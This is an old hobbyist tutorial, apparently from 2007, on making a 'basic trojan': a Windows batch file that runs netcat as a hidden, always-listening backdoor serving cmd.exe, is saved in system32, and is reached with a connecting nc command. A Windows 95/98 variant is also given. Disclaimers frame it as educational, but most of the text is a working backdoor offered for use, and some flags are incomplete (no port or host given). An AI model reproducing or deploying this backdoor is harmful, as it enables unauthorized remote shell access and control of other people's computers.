Basic Trojan Tutorial ***T&A*** By reading this document you have to agree not to use this for milicious purposes and only use the information given here on your own computers or on computers you have permission to use them on. Otherwise it is ILLEGAL to use this on any other computer without WRITTEN PERMISSION from the owner. ********* This tutorial will help you create a basic trojan with NetCat. Netcat is a free program that is used for connecting to other computers (often refered to as "telnet on steroids"). It can do advanced connections through M$'s command interpreter and Unix Shell. Here is how to create a simple trojan using Netcat. Make a new batch file with these contents. ::begining of trojan bat @echo off nc -L -d -p -t -e cmd.exe ::end of trojan bat This file must be saved in %SYSTEMROOT%\system32 to work. Also, a copy of NC.exe must be saved into %SYSTEMROOT%\system32. What this does is runs Netcat with the following options... -L tells netcat to never close and to always wait for connections -d tells netcat to be hidden and not open up a window -p tells netcat what port to listen on (1-65535) -t tells netcat to accept all connections to the specified port -e tells netcat what program to run once this batch has been made Once this batch file has been made and run on ONE OF YOUR COMPUTERS OR A COMUTER YOU HAVE WRITTEN PERMISSION TO PUT IT ON then you can connect to it by using this command in M$'s command interpretter... nc -v Once you enter that in then you should get a command interpretter on that computer. You now have ultimate power of the computer you connected to. Don't you feel proud of yourself :-) ***Note*** The batch file I show'd you above will not work on a M$ Winblows 95/98. If you want it to work on these OS's you will need to make these slight adjustments... ::beginning of trojan bat @echo off nc -L -d -p -t -e command.exe ::end of trojan bat And it needs to be saved in %SYSTEMROOT% not %SYSTEMROOT%\system32. Also a copy of NC.exe should also be saved in %SYSTEMROOT%. These changes are almost self explanitory so I will leave the that up to you. ****************************************************************************** *****************gopher://****************** ******************************Copyright(c) 2007******************************* This was made for educational purposes only and I (Jeremy Overman) am not responsable for anything you do with this information. This document may be published elsewhere or be printed as long as it is not altered and full credit is given to me. ******************************************************************************